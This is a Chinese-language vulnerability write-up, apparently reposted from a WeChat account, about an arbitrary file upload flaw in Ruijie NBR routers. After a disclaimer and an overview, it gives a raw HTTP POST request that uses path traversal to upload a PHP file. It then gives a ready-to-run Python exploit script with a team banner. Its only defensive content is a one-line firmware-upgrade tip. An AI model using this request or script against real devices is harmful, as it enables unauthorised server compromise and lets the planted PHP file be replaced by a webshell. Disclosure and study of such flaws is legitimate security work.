团队声明
该漏洞为我团队漏洞监测平台发现,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞概述
锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限。
影响版本
锐捷 NBR 路由器。
漏洞复现
出现漏洞的文件在 /ddi/server/fileupload.php, 该文件为标准的文件上传文件。
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1 Host: Accept: text/plain, */*; q=0.01 Content-Disposition: form-data; name="file"; filename="111.php" Content-Type: image/jpeg
<?php phpinfo();?>
访问上传的文件目录。
附代码
import requests
def display_banner():
banner = """
_____ _ _____ _____ _____
|_ _| | | __ _ _| __ \
| | | |_ _ __| |__) || | | |__) |
| | | | | | |/ _` | ___/ | | ___/
_| |_| | |_| | (_| | | _| |_|
|_____|_|__,_|__,_|_| |_____|
Welcome to RCS-TEAM !
"""
print(banner)
def main():
display_banner()
url = "http://example.com/ddi/server/fileupload.php?uploadDir=../../321&name=123.php"
headers = {
"Accept": "text/plain, */*; q=0.01",
}
files = {
"file": ("111.php", "<?php phpinfo();?>", "image/jpeg"),
}
response = requests.post(url, headers=headers, files=files)
print("Response Status Code:", response.status_code)
print("Response Content:", response.text)
if __name__ == "__main__":
main()
①升级到最新版本固件。
原文始发于微信公众号(小白嘿课):【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论